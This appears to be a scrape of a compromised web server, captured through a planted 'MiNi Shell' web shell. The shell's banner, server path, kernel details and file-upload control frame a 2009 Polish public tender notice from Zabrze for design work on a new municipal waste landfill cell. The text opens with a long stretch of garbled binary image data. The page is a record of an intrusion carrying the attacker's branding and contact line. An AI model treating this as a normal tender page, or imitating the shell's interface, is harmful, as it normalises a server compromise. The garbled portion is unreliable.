JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090812/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090812/132301-N-2009.html

<p class="kh_header"><b>Zabrze: Opracowanie dokumentacji projektowej budowy nowej kwatery odpadów komunalnych przy ul. Cmentarnej w Zabrzu</b><br>
<b>Numer ogłoszenia: 132301 - 2009; data zamieszczenia: 12.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji w Zabrzu Sp. z o.o. , ul. Matejki 6, 41-800 Zabrze, woj. śląskie, tel. 032 2716340, 2716640 w. 102, faks 032 2716340.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej budowy nowej kwatery odpadów komunalnych przy ul. Cmentarnej w Zabrzu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia.
Przedmiotem zamówienia jest opracowanie dokumentacji projektowej, przedmiaru robót, kosztorysu inwestorskiego i szczegółowej specyfikacji technicznej wykonania
i odbioru robót budowlanych oraz uzyskanie wszelkich niezbędnych opinii, uzgodnień, pozwoleń i decyzji dla zadania dot. budowy nowej kwatery odpadów komunalnych w Zabrzu. Kwatera budowana będzie na działkach 1099/94, 1100/97, 1101/97, 466/92, 1271/93, 920/89, 919/89, 922/88, 1514/101, 95, 954/96 i 98,  usytuowanych pomiędzy istniejąca kwaterą w eksploatacji a kwatera będącą obecnie w rekultywacji. 
Podstawą do projektowania jest mapa sytuacyjna terenu będąca załącznikiem do SIWZ. 

Zakres opracowania obejmuje wykonanie poniższych czynności w trzech etapach: 

etap I:
 a) dokonanie niezbędnych uzgodnień, uzyskanie ekspertyz, opinii oraz wykonanie
     mapy do celów projektowych,
b)  przeprowadzenie badan hydrologicznych i geologicznych;
c)  złożenie wniosku o wydanie decyzji o środowiskowych uwarunkowaniach
     realizacji inwestycji;
d)  wykonanie dokumentacji do wniosku o wydanie decyzji lokalizacyjnej
e)  złożenie wniosku o wydanie decyzji lokalizacyjnej planowanej inwestycji;

etap II: 
a)  wykonanie dokumentacji hydrologicznej i geologicznej;
b)  wykonanie projektu budowlanego;
c)  uzyskanie decyzji o pozwoleniu na budowę;

etap III:  
a)  uzyskanie pozwoleń wodnoprawnych;
b)  wykonanie projektu wykonawczego;
c)  wykonanie przedmiaru, kosztorysu inwestorskiego, specyfikacji technicznej
     wykonania i odbioru robót budowlanych oraz planu bezpieczeństwa i ochrony
     zdrowia ;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium. Oferta musi być zabezpieczona wadium 
o wartości 4 000 zł. 
Wadium może być wniesione w jednej lub kilku następujących formach:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego
ING Bank Śląski Oddz. Zabrze 07105015881000000201870557
Wadium wnoszone w formie: poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej , gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielonego przez Polską Agencję Rozwoju Przedsiębiorczości należy złożyć w formie oryginału w kasie MOSiR w Zabrzu 
Sp. z o.o. ul. Matejki 6, 41-800 Zabrze.
Wadium w formie pieniężnej musi wpłynąć na rachunek Zamawiającego, a poręczenie bankowe, gwarancja bankowa, gwarancja ubezpieczeniowa lub poręczenie udzielone przez Polską Agencję Rozwoju Przedsiębiorczości musi zostać złożone w kasie Zamawiającego najpóźniej do godz. 8:00 w dniu składania ofert.
Zamawiający w dniu otwarcia ofert o godz. 8:05 komisyjnie sprawdzi, czy wadium wpłynęło na rachunek bankowy lub do kasy Zamawiającego. Z powyższej czynności zostanie sporządzony protokół.
Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny ( z podaniem imienia i nazwiska).
Z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych.

Wadium musi być wniesione najpóźniej do dnia 01.09.2009 r. godz. 8:00.
Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
Dyspozycje w zakresie zwrotu wniesionego w pieniądzu wadium Wykonawcy, Zamawiający przekaże do banku niezwłocznie po:
- upływie terminu związania ofertą,
- zawarciu umowy w sprawie zamówienia publicznego i wniesienia 
zabezpieczenia należytego wykonania tej umowy,
- unieważnieniu postępowania o udzielenie niniejszego zamówienia 
publicznego, pod warunkiem, iż protesty zostały ostatecznie rozstrzygnięte 
lub upłynął termin do ich wnoszenia.
Zamawiający niezwłocznie dokona zwrotu wadium na wniosek Wykonawcy:
- który wycofał ofertę przed upływem terminu składania ofert,
- który został wykluczony z postępowania,
- którego oferta została odrzucona.
Wadium Wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz z odsetkami w przypadku, gdy Wykonawca:
-  w odpowiedzi na wezwanie , o którym mowa w art. 26 ust.2 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie,  
- odmówi podpisania umowy na warunkach określonych w ofercie,
- nie wniesie zabezpieczenia należytego wykonania umowy,
- zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki, jakie muszą spełniać Wykonawcy ubiegający się o udzielenie zamówienia:
1. Wykonawca winien być uprawniony do występowania w obrocie prawnym zgodnie z wymogami ustawowymi, co należy udokumentować załączając aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, jako załącznik nr 1.
2. Wykonawca posiada niezbędną wiedzę i doświadczenie w zakresie objętym zamówieniem. Wykonawca musi wykazać się doświadczeniem w realizacji przedmiotu zamówienia (wykonanie w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, minimum 2 usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, tj. z zakresu gospodarki odpadami o wartości nie mniej niż 120 000 zł brutto każda, co należy wykazać w załączniku nr 2 do oferty zgodnie z załączonym do SIWZ wzorem, oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie, jako załącznik nr 2(1-n). 
Załączone dokumenty muszą być podpisane przez Zleceniodawcę, opatrzone datą i zawierać informacje, które potwierdzają wymagane doświadczenie Wykonawcy oraz wykonanie zamówienia z należytą starannością.
3. Wykonawca dysponuje osobami zdolnymi do wykonania lub uczestniczenia w wykonaniu niniejszego zadania lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania lub uczestniczenia w wykonaniu niniejszego zamówienia , co należy wykazać w załączniku nr 3 zgodnie
z załączonym do SIWZ wzorem.
Projektanci muszą posiadać uprawnienia do wykonywania projektowania w branży architektoniczno-konstrukcyjnej i instalacyjnej, łącznie z wpisem na listę członków właściwej izby samorządu zawodowego. 
4. Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne albo uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, co należy udokumentować załączając kserokopię aktualnego zaświadczenia właściwego Urzędu Skarbowego i ZUS. Zaświadczenia muszą być wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert -załącznik nr 4, załącznik nr 5.
5.  Wykonawca musi załączyć do oferty zaświadczenie  z KRK o niekaralności, w zakresie określonym w art. 24 ust. 1 pkt 4 - 9 ustawy, jako załącznik nr 6 i 7 (wystawione nie wcześniej niż 6 m-ce przed upływem terminu składania ofert).
6.  Wykonawca nie podlega wykluczeniu z postępowania na podst. art. 24 ustawy Prawo zamówień publicznych oraz spełnia warunki art. 22 ust. 1 ustawy, co należy wykazać w załączniku nr 8, zgodnie z załączonym do SIWZ drukiem.

Ocena  spełnienia  w/w  warunków  dokonywana  zostanie  zgodnie  z  formułą spełnia - nie  spełnia,  w  oparciu  o  informacje  zawarte  w  dokumentach  i  oświadczeniach  wyszczególnionych  powyżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wykonawca winien być uprawniony do występowania w obrocie prawnym zgodnie z wymogami ustawowymi, co należy udokumentować załączając aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, jako załącznik nr 1.
2. Wykonawca posiada niezbędną wiedzę i doświadczenie w zakresie objętym zamówieniem. Wykonawca musi wykazać się doświadczeniem w realizacji przedmiotu zamówienia (wykonanie w okresie ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, minimum 2 usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, tj. z zakresu gospodarki odpadami o wartości nie mniej niż 120 000 zł brutto każda, co należy wykazać w załączniku nr 2 do oferty zgodnie z załączonym do SIWZ wzorem, oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie, jako załącznik nr 2(1-n). 
Załączone dokumenty muszą być podpisane przez Zleceniodawcę, opatrzone datą i zawierać informacje, które potwierdzają wymagane doświadczenie Wykonawcy oraz wykonanie zamówienia z należytą starannością.
3. Wykonawca dysponuje osobami zdolnymi do wykonania lub uczestniczenia w wykonaniu niniejszego zadania lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania lub uczestniczenia w wykonaniu niniejszego zamówienia , co należy wykazać w załączniku nr 3 zgodnie
z załączonym do SIWZ wzorem.
Projektanci muszą posiadać uprawnienia do wykonywania projektowania w branży architektoniczno-konstrukcyjnej i instalacyjnej, łącznie z wpisem na listę członków właściwej izby samorządu zawodowego. 
4. Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne albo uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, co należy udokumentować załączając kserokopię aktualnego zaświadczenia właściwego Urzędu Skarbowego i ZUS. Zaświadczenia muszą być wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert -załącznik nr 4, załącznik nr 5.
5.  Wykonawca musi załączyć do oferty zaświadczenie  z KRK o niekaralności, w zakresie określonym w art. 24 ust. 1 pkt 4 - 9 ustawy, jako załącznik nr 6 i 7 (wystawione nie wcześniej niż 6 m-ce przed upływem terminu składania ofert).
6.  Wykonawca nie podlega wykluczeniu z postępowania na podst. art. 24 ustawy Prawo zamówień publicznych oraz spełnia warunki art. 22 ust. 1 ustawy, co należy wykazać w załączniku nr 8, zgodnie z załączonym do SIWZ drukiem.

Oferta składana przez dwóch lub więcej Wykonawców musi zawierać
wymagane dokumenty i oświadczenia wymienione w pkt 1, 4, 5, 
-  dotyczące oddzielnie każdego Wykonawcy. 
Oferta składana przez dwóch lub więcej Wykonawców musi zawierać także 
dokumenty wymienione w pkt 2., 3 , i 6 - o łącznym
spełnianiu przez  Wykonawców warunków udziału w postępowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mosir.zabrze.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Zabrzu Sp. z o.o. 41-800 Zabrze, ul. J. Matejki 6, pokój nr 24.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2009 godzina 10:00, miejsce: Miejski Ośrodek Sportu i Rekreacji w Zabrzu Sp. z o.o.
(Hala Widowiskowo-Sportowa)
41-800 Zabrze, ul. Matejki 6, p. Nr 31.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 30.09.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com